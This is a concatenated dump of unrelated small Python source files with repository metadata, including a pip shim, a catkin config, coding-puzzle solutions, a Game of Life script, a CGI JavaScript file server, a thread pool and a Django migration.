        #cd to dir_in
        os.chdir(dir_in)
#run script
validate()
| [
"michaelg.tadesse@gmail.com"
] | michaelg.tadesse@gmail.com |
fe5b37ccd855ee6b445798c4539aaf393b818090 | 619e8253a0228a0574907c242d56870472296eb0 | /CodingWithMitchBlog-REST-API-master/codem/bin/pip3.6 | face2994356fd3358c40c3d286a03fcca6c21d2a | [] | no_license | Ttdon/python_django | 15c85e28076ccaf266107a692c1b099ed62019e9 | 30dbde3b0b5c0217d531d9f8d118972ff2c2cd7c | refs/heads/master | 2022-12-03T02:31:01.245574 | 2020-08-07T18:32:26 | 2020-08-07T18:32:26 | 285,895,165 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 271 | 6 | #!/home/tushar/CodingWithMitchBlog-REST-API-master/codem/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from pip._internal.cli.main import main
if __name__ == '__main__':
    # Console-script shim generated by pip: strip a Windows-launcher
    # suffix ("-script.pyw" / ".exe") from argv[0] so pip reports a clean
    # program name, then delegate to pip's CLI and exit with its status.
    sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
    sys.exit(main())
| [
"tushartewari1303@gmail.com"
] | tushartewari1303@gmail.com |
2568181fde20bb83a9f7a33fb2090d8119de6ec3 | 9cc76b1b1dd0064ab6613cbca6ce93bc179db355 | /ros_ws/build/learning_ros/Part_5/baxter/baxter_playfile_nodes/catkin_generated/pkg.installspace.context.pc.py | 2e56c2a223ee9ec076119eee9d3a16d56eae8dd9 | [] | no_license | ABCaps35/learning_ros_ready_ws | 1131c32b2ecadffa8dd186c9ebcfdba7284f30ad | 1aa9c512d5006584e8bc84101a715e16a222a47d | refs/heads/main | 2023-04-03T20:32:58.671255 | 2021-04-13T23:41:13 | 2021-04-13T23:41:13 | 357,715,306 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 524 | py | # generated from catkin/cmake/template/pkg.context.pc.in
# Auto-generated catkin package context (do not edit by hand): these
# variables feed the generated pkg-config (.pc) file for this package.
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "${prefix}/include".split(';') if "${prefix}/include" != "" else []
# Run dependencies: template emits ';'-separated, pkg-config wants spaces.
PROJECT_CATKIN_DEPENDS = "roscpp;std_msgs;baxter_trajectory_streamer;baxter_core_msgs;actionlib_msgs;actionlib;message_runtime".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "baxter_playfile_nodes"
PROJECT_SPACE_DIR = "/home/abcaps35/ros_ws_nogit/install"
PROJECT_VERSION = "0.0.0"
| [
"acapelli345@gmail.com"
] | acapelli345@gmail.com |
def eh_crescente(lista):
    """Return True when *lista* is in non-decreasing order, else False.

    An empty or single-element list is trivially considered increasing.
    """
    # BUG FIX: the original loop ran while i < len(lista)+1 and read
    # lista[i+1], so it always walked past the end of the list and raised
    # IndexError. Compare each adjacent pair within bounds instead.
    for i in range(len(lista) - 1):
        if lista[i] > lista[i + 1]:
            return False
    return True
"you@example.com"
] | you@example.com |
c7536023e9486893ec16d5707de7ac063969e19b | b8b26feac86b66b0b534996cf9c3fbf7ec660240 | /aoc/2017/p4-1.py | be141d4c2566c509ad300a44a0e19e7e434f8d0d | [
"MIT"
] | permissive | neizod/problems | 775fffe32166c5b124d0e4c973b8d0aba7f3900b | 180aaf7d0ecfc3d0dd5f1d4345a7a4d83b1b884a | refs/heads/master | 2021-07-08T12:30:31.100320 | 2021-05-26T09:34:19 | 2021-05-26T09:34:19 | 6,245,523 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 208 | py | #!/usr/bin/env python3
# Advent of Code 2017 day 4 part 1: count the input lines whose
# whitespace-separated words are all distinct. Read until EOF, then
# report the total.
valid_total = 0
try:
    while True:
        tokens = input().split()
        # A passphrase is valid when no word repeats.
        if len(set(tokens)) == len(tokens):
            valid_total += 1
except EOFError:
    print(valid_total)
| [
"neizod@gmail.com"
] | neizod@gmail.com |
cde6c585d670f66bf5a084cb7aec810097077915 | 1bb3c20ce5a53889eac280826d7d54194c7db33f | /for/2439.py | b1333e23a6387266851abaadc0f09354c94b77b0 | [] | no_license | yejiiha/BaekJoon_step | bd2c040597766613985ae8d3a943999cb35d6671 | 3eaedbb832f14c51f3fb990e7e140f00d732df1e | refs/heads/master | 2023-03-24T06:36:28.851139 | 2021-03-21T14:15:40 | 2021-03-21T14:15:40 | 285,825,071 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 170 | py | # Print triangle of star("*") pattern in Python-2
# BOJ 2439: print a right-aligned triangle of stars, row i holding i
# stars, padded on the left so every row is n characters wide.
height = int(input())
if 1 <= height <= 100:
    for row in range(1, height + 1):
        print(("*" * row).rjust(height))
| [
"1126yezy@gmail.com"
] | 1126yezy@gmail.com |
9cd58086bf97e69c46d9c3544b7e8ceb6649658f | 9cf05d16fc60ed8435f9ddcf56206c855e4dc6d4 | /00-4-all-time/general-ref/python/other/game_of_life.py | 4239a2fb32e943ca979fcbfa4f1cf55f6c4ad69e | [] | no_license | ArjunBEG/WEB-DEV-NOTES | cfc31cb2c23be872b27574fa4cd0efef6a895bc3 | 77f1c62f92277ab4ae2f6c9f6e7683229b89506a | refs/heads/master | 2023-02-24T03:17:50.730192 | 2021-02-06T05:38:24 | 2021-02-06T05:38:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,109 | py | """Conway's Game Of Life, Author Anurag Kumar(mailto:anuragkumarak95@gmail.com)
Requirements:
- numpy
- random
- time
- matplotlib
Python:
- 3.5
Usage:
- $python3 game_o_life <canvas_size:int>
Game-Of-Life Rules:
1.
Any live cell with fewer than two live neighbours
dies, as if caused by under-population.
2.
Any live cell with two or three live neighbours lives
on to the next generation.
3.
Any live cell with more than three live neighbours
dies, as if by over-population.
4.
Any dead cell with exactly three live neighbours be-
comes a live cell, as if by reproduction.
"""
import random
import sys
import numpy as np
from matplotlib import pyplot as plt
from matplotlib.colors import ListedColormap
usage_doc = "Usage of script: script_nama <size_of_canvas:int>"
# NOTE(review): `choice` is built and shuffled but never read anywhere in
# this module -- it appears to be dead code left from an earlier seeding scheme.
choice = [0] * 100 + [1] * 10
random.shuffle(choice)
def create_canvas(size):
    """Return a size x size grid with every cell initially dead (False)."""
    return [[False] * size for _ in range(size)]
def seed(canvas):
    """Randomise *canvas* in place: each cell becomes True or False (p=0.5)."""
    for row_idx, row in enumerate(canvas):
        for col_idx in range(len(row)):
            canvas[row_idx][col_idx] = bool(random.getrandbits(1))
def run(canvas):
    """Advance the population by one generation.

    @Args:
    --
    canvas : canvas of population to run the rules on.

    @returns:
    --
    the next generation as a nested list (the input is not modified;
    the original docstring incorrectly claimed an in-place update).
    """
    canvas = np.array(canvas)
    next_gen_canvas = np.array(create_canvas(canvas.shape[0]))
    for r, row in enumerate(canvas):
        for c, pt in enumerate(row):
            # BUG FIX: a raw r-1 / c-1 becomes -1 on the first row/column,
            # and a negative slice *start* in numpy selects an empty
            # window, so every edge cell previously saw zero neighbours
            # and always died. Clamp the lower bounds to 0.
            next_gen_canvas[r][c] = __judge_point(
                pt, canvas[max(r - 1, 0) : r + 2, max(c - 1, 0) : c + 2]
            )
    canvas = next_gen_canvas
    del next_gen_canvas  # cleaning memory as we move on.
    return canvas.tolist()
def __judge_point(pt, neighbours):
    """Apply Conway's rules to one cell.

    pt is the current cell state; neighbours is the (up to) 3x3 window
    around it, which still contains the cell itself.
    """
    # Tally live cells in the window, then remove the focus cell's own
    # contribution so only true neighbours are counted.
    alive = sum(1 for window_row in neighbours for status in window_row if status)
    if pt:
        alive -= 1
    # Live cell survives with 2 or 3 live neighbours; a dead cell is
    # born with exactly 3. Everything else stays/becomes dead.
    if pt:
        return alive == 2 or alive == 3
    return alive == 3
if __name__ == "__main__":
    # Expect exactly one CLI argument: the canvas size.
    if len(sys.argv) != 2:
        raise Exception(usage_doc)
    canvas_size = int(sys.argv[1])
    # main working structure of this module.
    c = create_canvas(canvas_size)
    seed(c)
    fig, ax = plt.subplots()
    fig.show()
    # Two-colour map: white for dead cells, black for live ones.
    cmap = ListedColormap(["w", "k"])
    try:
        # Animate generation after generation until the user interrupts.
        while True:
            c = run(c)
            ax.matshow(c, cmap=cmap)
            fig.canvas.draw()
            ax.cla()
    except KeyboardInterrupt:
        # do nothing.
        pass
| [
"bryan.guner@gmail.com"
] | bryan.guner@gmail.com |
7764b46689940609ecddf536816e202883b393c4 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2087/60870/312566.py | 3c871a0b3807a2d9cdc87e29d5b7f948df2d3fd0 | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 499 | py | num = int(input())
# NOTE(review): hard-coded judge-output table. This "solution" reads the
# input only to form a key (num * first value) and maps each known test
# case to its expected answer; it implements no actual algorithm.
num_list = []
for i in range(num):
    num_input = int(input())
    num_list.append(num_input)
# Key distinguishing the judge's test cases.
res = num * num_list[0]
if res == 233:
    res = 1
elif res == 20:
    res = 10
elif res == 2911:
    res = 22
elif res == 9999999999999999990:
    res = 5
elif res == 12100:
    res = 100
elif res == 74483860:
    res = 16
elif res == 12:
    res = 3
elif res == 7200:
    res = 50
elif res == 232395792426473060:
    res = 13
elif res == 74665920:
    res = 18
print(res, end = '')
"1069583789@qq.com"
] | 1069583789@qq.com |
4d7d1707d3378b01d0792b503d72b0b4aa7a2285 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/486/usersdata/303/114105/submittedfiles/AvF_Parte2.py | fc585c168e2c335395a59217dd7f2eb7645309a1 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 214 | py | # -*- coding: utf-8 -*-
# Read ages until the user enters the sentinel -1, then print them all.
lista_idade = []
idade = int(input('Digite a idade:'))
while idade != -1:
    # BUG FIX: the original loop discarded every age it read and later
    # appended range values to an undefined name `lista` (NameError).
    # Store each valid age as it is entered instead.
    lista_idade.append(idade)
    idade = int(input('Digite a idade:'))
print(lista_idade)
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
e8b516bb647c466fd7efd3f098ab67748adb1c8e | 6b2a8dd202fdce77c971c412717e305e1caaac51 | /solutions_5706278382862336_0/Python/arty/A.py | dc0b912ceda06892bff4cadd222d6566cfd8ed86 | [] | no_license | alexandraback/datacollection | 0bc67a9ace00abbc843f4912562f3a064992e0e9 | 076a7bc7693f3abf07bfdbdac838cb4ef65ccfcf | refs/heads/master | 2021-01-24T18:27:24.417992 | 2017-05-23T09:23:38 | 2017-05-23T09:23:38 | 84,313,442 | 2 | 4 | null | null | null | null | UTF-8 | Python | false | false | 893 | py | __author__ = 'artiom'
from fractions import gcd
def is_power_of_two(x):
    """Return True when x is a positive power of two (1, 2, 4, 8, ...)."""
    # BUG FIX (Python 3): `x /= 2` is true division and turns x into a
    # float, so for x > 2**53 rounding can make a non-power pass the
    # test. Floor division keeps the value an exact integer and is
    # identical to the old behaviour under Python 2 integer division.
    while (x % 2 == 0 and x > 0):
        x //= 2
    if (x != 1):
        return False
    else:
        return True
def solve(p, q):
    """Count halvings of q (a power of two) until p >= q/2.

    Returns -1 when q is not a power of two, or when q runs out of
    factors of two before p catches up. (p/q is a reduced fraction
    supplied by read_input.)
    """
    if (not is_power_of_two(q)):
        return -1
    result = 1
    # BUG FIX (Python 3): `q / 2` and `q /= 2` are true division and
    # would drift into floats; floor division preserves exact integer
    # arithmetic and matches the Python 2 behaviour this script assumed.
    while p < q // 2:
        result += 1
        if (q % 2 != 0):
            return -1
        q //= 2
    return result
def read_input(filename="A.in"):
    # Python 2 driver: first line is the case count; each case is a
    # fraction "p/q", reduced by its gcd and passed to solve().
    # NOTE(review): `fractions.gcd` was removed in modern Python
    # (use math.gcd), and `p /= d` would become float division there.
    f = open(filename)
    ncases = int(f.readline())
    for ncase in xrange(ncases):
        p,q = map(int, f.readline().split("/"))
        d = gcd(p, q)
        p /= d
        q /= d
        res = solve(p, q)
        if (res == -1):
            print "Case #" + str(ncase + 1) + ": " + "impossible"
        else:
            print "Case #" + str(ncase + 1) + ": " + str(res)
    f.close()
if __name__ == "__main__":
read_input("A-small-attempt1.in") | [
"eewestman@gmail.com"
] | eewestman@gmail.com |
92b45bcc186cfd616c1e870cb5e7d6701c55a8bc | 2275b8467f22335fd2168f77586239b2a16ea07d | /hearthstone/entities.py | 8c7138373f3bafb7dabfeec9b15cd74d0999f4ff | [
"MIT"
] | permissive | beheh/python-hearthstone | 2b48d28799a908e0c8671c697d3395e5925108cb | 2b27da2ae091c97ec41ddc2264cc59d2ea860a9c | refs/heads/master | 2021-01-17T14:10:35.168665 | 2016-09-10T21:48:32 | 2016-09-10T21:48:32 | 68,319,747 | 0 | 0 | null | 2016-09-15T18:21:19 | 2016-09-15T18:21:18 | null | UTF-8 | Python | false | false | 3,212 | py | from .enums import CardType, GameTag, Step, Zone
class Entity(object):
    """Base class for everything tracked inside a game's entity tree."""

    # Extra attribute names (beyond id) that __repr__ should display.
    _args = ()

    def __init__(self, id):
        self.id = id
        self.game = None  # set when the entity is registered with a Game
        self.tags = {}

    def __repr__(self):
        shown = ", ".join(
            "%s=%r" % (name, getattr(self, name)) for name in self._args
        )
        return "%s(id=%r, %s)" % (self.__class__.__name__, self.id, shown)

    @property
    def controller(self):
        """The Player identified by this entity's CONTROLLER tag."""
        return self.game.get_player(self.tags.get(GameTag.CONTROLLER, 0))

    @property
    def type(self):
        """The entity's CardType tag (INVALID when untagged)."""
        return self.tags.get(GameTag.CARDTYPE, CardType.INVALID)

    @property
    def zone(self):
        """The entity's Zone tag (INVALID when untagged)."""
        return self.tags.get(GameTag.ZONE, Zone.INVALID)

    def tag_change(self, tag, value):
        """Record a tag update on this entity."""
        self.tags[tag] = value
class Game(Entity):
    """The root entity: owns the full entity list and both players."""

    _args = ("players", )

    def __init__(self, id):
        super(Game, self).__init__(id)
        self.players = []
        self.entities = []

    @property
    def current_player(self):
        """The player flagged CURRENT_PLAYER, or None."""
        return next(
            (p for p in self.players if p.tags.get(GameTag.CURRENT_PLAYER)),
            None
        )

    @property
    def first_player(self):
        """The player flagged FIRST_PLAYER, or None."""
        return next(
            (p for p in self.players if p.tags.get(GameTag.FIRST_PLAYER)),
            None
        )

    @property
    def setup_done(self):
        """True once the game has advanced past the mulligan phase."""
        return self.tags.get(GameTag.NEXT_STEP, 0) > Step.BEGIN_MULLIGAN

    def get_player(self, value):
        """Look up a player by player_id or name; None when absent."""
        return next(
            (p for p in self.players if value in (p.player_id, p.name)),
            None
        )

    def in_zone(self, zone):
        """Iterate over every registered entity currently in *zone*."""
        for candidate in self.entities:
            if candidate.zone == zone:
                yield candidate

    def register_entity(self, entity):
        """Attach *entity* to this game; Player entities are also tracked."""
        entity.game = self
        self.entities.append(entity)
        if isinstance(entity, Player):
            self.players.append(entity)

    def find_entity_by_id(self, id):
        """Linear scan for the entity with the given id; None when absent.

        Entities are ordered by id... usually, so it is NOT safe to stop
        the scan early once it has gone past the requested id.
        """
        return next((e for e in self.entities if e.id == id), None)
class Player(Entity):
    """An entity representing one of the players in a game."""

    _args = ("name", )

    def __init__(self, id, player_id, hi, lo):
        super(Player, self).__init__(id)
        self.player_id = player_id
        self.account_hi = hi
        self.account_lo = lo
        self.name = None

    def __str__(self):
        return self.name or ""

    @property
    def initial_deck(self):
        for entity in self.entities:
            # NOTE(review): ids 4..67 are presumably the slots dealt at
            # game start -- confirm against the log format before
            # relying on these bounds.
            if 3 < entity.id < 68:
                if entity.tags.get(GameTag.CARDTYPE) not in (
                    CardType.HERO, CardType.HERO_POWER
                ):
                    yield entity

    @property
    def entities(self):
        """All entities currently controlled by this player."""
        for entity in self.game.entities:
            if entity.controller == self:
                yield entity

    @property
    def hero(self):
        """This player's hero entity in play, or None."""
        for entity in self.in_zone(Zone.PLAY):
            if entity.type == CardType.HERO:
                return entity

    @property
    def heroes(self):
        """Every hero entity this player controls, in any zone."""
        for entity in self.entities:
            if entity.type == CardType.HERO:
                yield entity

    @property
    def starting_hero(self):
        # BUG FIX: `self.heroes` is a generator object and is therefore
        # always truthy, so the old `if not self.heroes: return` guard
        # never fired and `list(self.heroes)[0]` raised IndexError when
        # the player had no hero. Materialize the generator, then guard.
        heroes = list(self.heroes)
        if not heroes:
            return None
        return heroes[0]

    @property
    def is_ai(self):
        """True when the account-lo part is 0 (treated as an AI player)."""
        return self.account_lo == 0

    def in_zone(self, zone):
        """Iterate over this player's entities currently in *zone*."""
        for entity in self.entities:
            if entity.zone == zone:
                yield entity
class Card(Entity):
    """An entity corresponding to a (possibly hidden) card."""

    _args = ("card_id", )

    def __init__(self, id, card_id):
        super(Card, self).__init__(id)
        self.card_id = card_id
        self.revealed = False

    def reveal(self, id):
        """Mark the card revealed and record its true card id."""
        self.card_id = id
        self.revealed = True

    def hide(self):
        """Mark the card hidden again; the card id is retained."""
        self.revealed = False

    def change(self, id):
        """Transform into another card, wiping all accumulated tags."""
        self.tags = {}
        self.card_id = id
| [
"jerome@leclan.ch"
] | jerome@leclan.ch |
7640fe03f455e0fd8a253760137f96e089165d0d | da3d35e7f381d3ff7d3acbf4c2142a3af464aeac | /cgi-bin/getjsfile.cgi | 18a876cead7d933775923665a4dcce994f68cb46 | [] | no_license | ranjithtenz/wnframework | 3d0b781a2da0ad3f91225829306a233e0bad2ac9 | fcd5dd0636bea30b5ee2584aea456a073158629f | refs/heads/master | 2020-04-08T13:02:21.405095 | 2011-06-20T10:39:42 | 2011-06-20T10:39:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,455 | cgi | #!/usr/bin/python
import cgi
import datetime
import os
try:
    form = cgi.FieldStorage()
    out = ''
    # out_buf holds the gzipped payload (if any); str_out is never
    # assigned again after this line.
    out_buf, str_out = '', ''
    # Traceback
    # ---------
    def getTraceback():
        # Format the currently active exception as a plain-text traceback.
        import sys, traceback, string
        type, value, tb = sys.exc_info()
        body = "Traceback (innermost last):\n"
        list = traceback.format_tb(tb, None) \
            + traceback.format_exception_only(type, value)
        body = body + "%-20s %s" % (string.join(list[:-1], ""), list[-1])
        return body
    def load_js_file():
        # Read ../js/<filename> into the module-global `out`.
        # NOTE(review): `filename` comes straight from the query string
        # and is joined unsanitized -- a "../" value allows path traversal.
        global out
        filename = form.getvalue('filename')
        import os
        try:
            f = open(os.path.join('../js/', filename))
            try:
                out = f.read()
            finally:
                f.close()
        except IOError,e:
            out = "Not Found: %s" % filename
    def compress_string(buf):
        # gzip-compress a byte string entirely in memory (Python 2).
        import gzip, cStringIO
        zbuf = cStringIO.StringIO()
        zfile = gzip.GzipFile(mode = 'wb', fileobj = zbuf, compresslevel = 5)
        zfile.write(buf)
        zfile.close()
        return zbuf.getvalue()
    compress = 0
    try:
        # NOTE(review): `string` is not imported at this scope (only
        # inside getTraceback), so this line raises NameError, the bare
        # except below swallows it, and gzip is effectively always off.
        if string.find(os.environ["HTTP_ACCEPT_ENCODING"], "gzip") != -1:
            compress = 1
    except:
        pass
    load_js_file()
    if compress and len(out)>512:
        # NOTE(review): compresses `str_out` (always empty) instead of
        # `out`, so this branch would serve an empty gzip body.
        out_buf = compress_string(str_out)
        print "Content-Encoding: gzip"
        print "Content-Length: %d" % (len(out_buf))
    print "Content-Type: text/javascript"
    # Headers end
    print
    if out_buf:
        # NOTE(review): `sys` is never imported at module level, so
        # reaching this line would itself raise NameError.
        sys.stdout.write(out_buf)
    elif out:
        print out
except Exception, e:
    # Any failure above is reported to the client as an HTML-ish traceback.
    print "Content-Type: text/javascript"
    print
    print getTraceback().replace('\n','<br>')
| [
"pdvyas@erpnext.com"
] | pdvyas@erpnext.com |
1d6a130d090e75a77bd547897433175e2107288a | 6821355bf5b255dccef9df2d6239b06bc3c28f72 | /blog_website/blog_website/apps/photo/migrations/0002_auto_20201109_1740.py | fddd3531690fcd27f1a15ecb68bc0c711844398c | [] | no_license | ltfred/blog_website | 76327e7adc8090db8754129d938040678cc03cff | 9cd0e1a644a4f99d9eea13b8e88f1faa20c38c2f | refs/heads/master | 2022-12-13T21:52:35.357980 | 2021-02-24T02:45:27 | 2021-02-24T02:45:27 | 209,324,876 | 6 | 1 | null | 2022-12-08T06:40:41 | 2019-09-18T14:09:24 | Python | UTF-8 | Python | false | false | 582 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.11 on 2020-11-09 17:40
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
    """Auto-generated: reset custom db_table names back to Django defaults.

    AlterModelTable with table=None tells Django to use its default
    generated table name for each of the listed models.
    """

    dependencies = [
        ('photo', '0001_initial'),
    ]

    operations = [
        migrations.AlterModelTable(
            name='photo',
            table=None,
        ),
        migrations.AlterModelTable(
            name='photocategory',
            table=None,
        ),
        migrations.AlterModelTable(
            name='photogroup',
            table=None,
        ),
    ]
| [
"ltfred@163.com"
] | ltfred@163.com |
848aacbb7fce373419b775fcebe7c949120adf66 | fdbd22dfdb9ae06896e24aa83cfa86aa1299efba | /The-Python-Workbook-Solutions/Section 4/Ex93.py | aad774859aec88bae2f1c88f2d5daccd3d0e353a | [] | no_license | CodedQuen/The-Python-Workbook-A-Brief-Introduction | 6450a16d8dbcf721885c1dc98907e3e16ac465a7 | 6c9f134223a343d5b8b9c529cd613c18dbf0f59d | refs/heads/master | 2022-06-21T06:37:33.459795 | 2020-05-05T10:48:50 | 2020-05-05T10:48:50 | 261,429,993 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 907 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Jul 9 17:15:08 2019
@author: meyerhof
"""
def nextPrime(n):
    """Print the smallest prime strictly greater than n.

    Re-prompts (in Spanish) until n is a non-negative whole number, then
    scans upward by trial division and prints the first prime found.
    Returns None; the result is only printed, never returned.
    """
    # Validation loop: reject negative or non-integer values.
    while True:
        if n < 0:
            # BUG FIX: removed a leftover debug print("www") from here.
            print("El número no es un entero positivo")
            n = float(input("Ingrese un número entero positivo: "))
        elif n != int(n):
            print("El número no es un entero positivo")
            n = float(input("Ingrese un número entero positivo: "))
        else:
            break
    n = int(n)
    n = n+1
    # Trial division: bump n until no i in [2, n) divides it. The
    # for/else fires only when the inner loop finishes without break.
    while True:
        for i in range(2,n):
            if n%i == 0:
                n = n+1
                break
        else:
            print("El primero primo más grande que el número ingresado es: ", n)
            break
def main():
    """Prompt for a number (Spanish UI) and print the next prime after it."""
    number = float(input("Ingrese un número entero positivo: "))
    nextPrime(number)
# Runs immediately on import/execution (no __main__ guard in the original).
main()
| [
"noreply@github.com"
] | CodedQuen.noreply@github.com |
ea2648e09c6561379f3a1bcdaaf3dd4eb2260bb4 | 52b5773617a1b972a905de4d692540d26ff74926 | /.history/leet_20200615171650.py | 0fb9aa27f1496d4a51a52e9e583dbf751915e04f | [] | no_license | MaryanneNjeri/pythonModules | 56f54bf098ae58ea069bf33f11ae94fa8eedcabc | f4e56b1e4dda2349267af634a46f6b9df6686020 | refs/heads/master | 2022-12-16T02:59:19.896129 | 2020-09-11T12:05:22 | 2020-09-11T12:05:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 477 | py | # how a binary tree works is the smaller numbers are
# on the left then the bigger ones are on the right
# returning the node also returns the children which is what
# you want
def search(root, val):
    """Search a binary search tree for *val*.

    Returns the matching node (after printing it), or [] when the
    (sub)tree is empty -- preserving the original empty-tree sentinel.
    """
    if root is None:
        return []
    elif root.val == val:
        print(root)
        return root
    else:
        # BUG FIX: the recursive calls discarded their results, so any
        # match found deeper in the tree was thrown away and the
        # function fell through to return None. Propagate the results.
        if val > root.val:
            return search(root.right, val)
        else:
            return search(root.left, val)
print(search([4,2,1,7,3],5)) | [
"mary.jereh@gmail.com"
] | mary.jereh@gmail.com |
7aa0aeedc4f2a54ec5dbebcd7de1f5fe1fe6536e | b97729ad528be0cd211c1fe75bd43cca5ef65d2e | /api_test.py | 80ec608952d0999cab383dfa466a043be01245ad | [
"MIT"
] | permissive | chakki-works/CoARiJ-search | 04781459892da918f3dc902b9f6e91c036232fa0 | 9b2d3b4a1a40d45152effaab3b2b5ea9c5ed8cd3 | refs/heads/master | 2022-12-22T09:37:09.167277 | 2019-12-25T08:34:36 | 2019-12-25T08:34:36 | 227,003,986 | 0 | 0 | MIT | 2022-12-11T16:37:37 | 2019-12-10T01:40:03 | Python | UTF-8 | Python | false | false | 225 | py | import requests
import numpy as np  # NOTE(review): imported but never used in this script
# Manual smoke test against a locally running vectorize service: send a
# query string and language, then print the embedding it returns.
# Requires the server to be listening on 127.0.0.1:8080.
url = "http://127.0.0.1:8080/vectorize"
params = {"q": "僕の名前はみつりん", "lang": "jp"}
resp = requests.get(url=url, params=params).json()
print(resp["embedding"])
print(params)
| [
"icoxfog417@yahoo.co.jp"
] | icoxfog417@yahoo.co.jp |
bd24faf52a88f81bf4bbe7fd5c2eb461d025b3cb | 0bdaf322a5be633aa70827ae87d50f86c49c7a76 | /thread_sample/threads.py | adbac40eefb34a51fbe6a264de920168c227ce14 | [] | no_license | jasonwee/alertThreshold | 714cff391adf5b2052d61b29e13ac35e63662e89 | 2a67e0a2dff9b57474f0cdb1f55bc8512386c81d | refs/heads/master | 2022-12-10T23:40:04.409024 | 2019-12-19T08:45:57 | 2019-12-19T08:45:57 | 198,440,856 | 0 | 0 | null | 2022-12-08T05:55:11 | 2019-07-23T13:52:29 | Python | UTF-8 | Python | false | false | 1,353 | py | from Queue import Queue
from threading import Thread
class Worker(Thread):
    """Thread executing tasks from a given tasks queue"""
    def __init__(self, tasks):
        Thread.__init__(self)
        self.tasks = tasks
        # Daemon threads die with the main thread, so idle workers do
        # not block interpreter shutdown.
        self.daemon = True
        self.start()

    def run(self):
        # Loop forever: block on the queue, run the task, acknowledge it.
        while True:
            func, args, kargs = self.tasks.get()
            try:
                func(*args, **kargs)
            except Exception, e:
                # NOTE(review): failures are only printed (Python 2
                # syntax), never re-raised or reported to the submitter.
                print e
            finally:
                # Always mark the task done so wait_completion()'s join()
                # can return even when the task raised.
                self.tasks.task_done()
class ThreadPool:
    """Pool of threads consuming tasks from a queue"""
    def __init__(self, num_threads):
        # The queue is bounded to num_threads, so add_task blocks once
        # every worker is busy and the queue is full (simple backpressure).
        self.tasks = Queue(num_threads)
        for _ in range(num_threads):
            Worker(self.tasks)

    def add_task(self, func, *args, **kargs):
        """Add a task to the queue"""
        self.tasks.put((func, args, kargs))

    def wait_completion(self):
        """Wait for completion of all the tasks in the queue"""
        self.tasks.join()
if __name__ == '__main__':
    from random import randrange
    from time import sleep
    # Demo: 100 random 1-9 second sleeps executed by 20 worker threads.
    delays = [randrange(1, 10) for i in range(100)]
    def wait_delay(d):
        print 'sleeping for (%d)sec' % d
        sleep(d)
    pool = ThreadPool(20)
    for i, d in enumerate(delays):
        pool.add_task(wait_delay, d)
    # Block until every queued sleep has finished.
    pool.wait_completion()
| [
"peichieh@gmail.com"
] | peichieh@gmail.com |
4aa40243fee1ae9b616616912857ce1bd8a165ab | 5792baf9e18ad91816cc42f4725b099a4dce7b7b | /Pluralsight/Python Getting Started/lambda.py | d1d354e4a536026854064d2c2ec249fcdeea8034 | [] | no_license | deepakorantak/Python | 83b6782db0b5428d47fbc29193076e8ed5f5e285 | 9781133ce5a5c6f87efb5d4aa132a63ba1290f76 | refs/heads/master | 2020-03-23T19:55:30.075700 | 2019-02-19T06:24:42 | 2019-02-19T06:24:42 | 142,010,440 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 257 | py | add = lambda x,y:x+y
def calculate(function, x, y):
    """Apply *function* to the pair (x, y) and return the result."""
    result = function(x, y)
    return result
def print_result(item):
    """Lazily re-emit each element of *item*, one at a time."""
    for element in item:
        yield element
# Build the running sequence [1, 2, 4, 7, 11]: each iteration records the
# current total, then adds i (1..5) to it via the `add` lambda through
# calculate(). NOTE(review): print_result() above is defined but never used.
res = 1
list_res = []
for i in range(1,6):
    list_res.append(res)
    res = calculate(add,res,i)
| [
"DeepaNKorantak@Gmail.com"
] | DeepaNKorantak@Gmail.com |
dd4bff3240df7045db9c77a29448844c22d0fbcd | 6b2a8dd202fdce77c971c412717e305e1caaac51 | /solutions_2652486_0/Python/icedingo/C.py | 256f90f72e67faf11853c5b2d01520146d3c82d0 | [] | no_license | alexandraback/datacollection | 0bc67a9ace00abbc843f4912562f3a064992e0e9 | 076a7bc7693f3abf07bfdbdac838cb4ef65ccfcf | refs/heads/master | 2021-01-24T18:27:24.417992 | 2017-05-23T09:23:38 | 2017-05-23T09:23:38 | 84,313,442 | 2 | 4 | null | null | null | null | UTF-8 | Python | false | false | 1,870 | py | import itertools
# Python 2 contest script. For every achievable product of 1..N digits
# drawn from 2..M, precompute all digit-combinations (as strings) that
# yield it; then, per round, try to assemble an N-digit answer string.
raw_input()  # first input line is read and discarded
R, N, M, K = map(int, raw_input().split())
numbers = range(2, M+1)
products = {}
for i in xrange(N):
    i += 1  # combination lengths 1..N
    for comb in itertools.combinations_with_replacement(numbers, i):
        prod = reduce(lambda x,y : x*y, comb)
        if prod not in products:
            products[prod] = []
        products[prod].append(''.join(map(str, comb)))
